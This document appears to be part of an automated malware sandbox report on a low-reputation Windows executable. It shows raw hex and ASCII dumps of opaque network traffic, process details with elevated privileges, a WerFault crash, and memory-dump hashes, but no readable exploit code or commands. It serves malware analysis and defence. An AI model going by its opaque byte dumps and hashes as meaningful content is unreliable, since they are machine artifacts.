                                                                                                                                                                    2024-12-23 07:04:36 UTC1024INData Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba
                                                                                                                                                                    Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\SAZ(\a,p?
                                                                                                                                                                    2024-12-23 07:04:36 UTC1749INData Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3
                                                                                                                                                                    Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
                                                                                                                                                                    2024-12-23 07:04:36 UTC16384INData Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e
                                                                                                                                                                    Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
                                                                                                                                                                    2024-12-23 07:04:36 UTC1024INData Raw: 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2 b8 6f 08 25 4c df 44 99 5d 27 53 f5 cf fb d0 f1 3b 9e a0 da 47 87 50 21 1b 80 74 df 40 4a ce cc
                                                                                                                                                                    Data Ascii: |Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>o%LD]'S;GP!t@J
                                                                                                                                                                    2024-12-23 07:04:36 UTC16384INData Raw: f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65 02 36 f5 9b 4e ee 3c 1e e1 13 44 69 6c 0e f0 1e 6d f3 65 43 97 63 00 ac 8c 80 95 09 d0 c5 1f 88
                                                                                                                                                                    Data Ascii: zRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}|W Qp9Rx@*Y%X$=x$Fqx.v*e6N<DilmeCc


                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:02:04:05
                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Yh6fS6qfTE.exe"
                                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                                    File size:2'968'064 bytes
                                                                                                                                                                    MD5 hash:6CB8E80FE23740DFF137816A6572A5BA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:02:04:37
                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 1928
                                                                                                                                                                    Imagebase:0xcc0000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000003.1514698464.0000000001456000.00000004.00000020.00020000.00000000.sdmp, Offset: 01456000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_3_1456000_Yh6fS6qfTE.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b10b6c1848a9081a2b2e12ff5fb2f3aab8af210ada974a4b67ea859181cd15c4
                                                                                                                                                                      • Instruction ID: 507b2145592ae7b46ae6cd971c7ec9670507a48c5ff95870f31e1b4282535933
                                                                                                                                                                      • Opcode Fuzzy Hash: b10b6c1848a9081a2b2e12ff5fb2f3aab8af210ada974a4b67ea859181cd15c4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A2223A284E7C55FD7038B705C6A650BFB56E6320470ECACFC8C58F4A3E719994AD322
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000003.1514698464.0000000001456000.00000004.00000020.00020000.00000000.sdmp, Offset: 01456000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_3_1456000_Yh6fS6qfTE.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3b9e9fc36637c87a7b6fb6d305cffd9fdcad4e6c5f6e5bd50737d573ab3e0826
                                                                                                                                                                      • Instruction ID: 4cb9db305936c1e08aaa2527d457837056ac47ee228966495df5f6188bafa45c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b9e9fc36637c87a7b6fb6d305cffd9fdcad4e6c5f6e5bd50737d573ab3e0826
                                                                                                                                                                      • Instruction Fuzzy Hash: 544159300092D68BD757CF38CA98696BFA1BF03218B1C07EAD9C18F6A3D3755545C356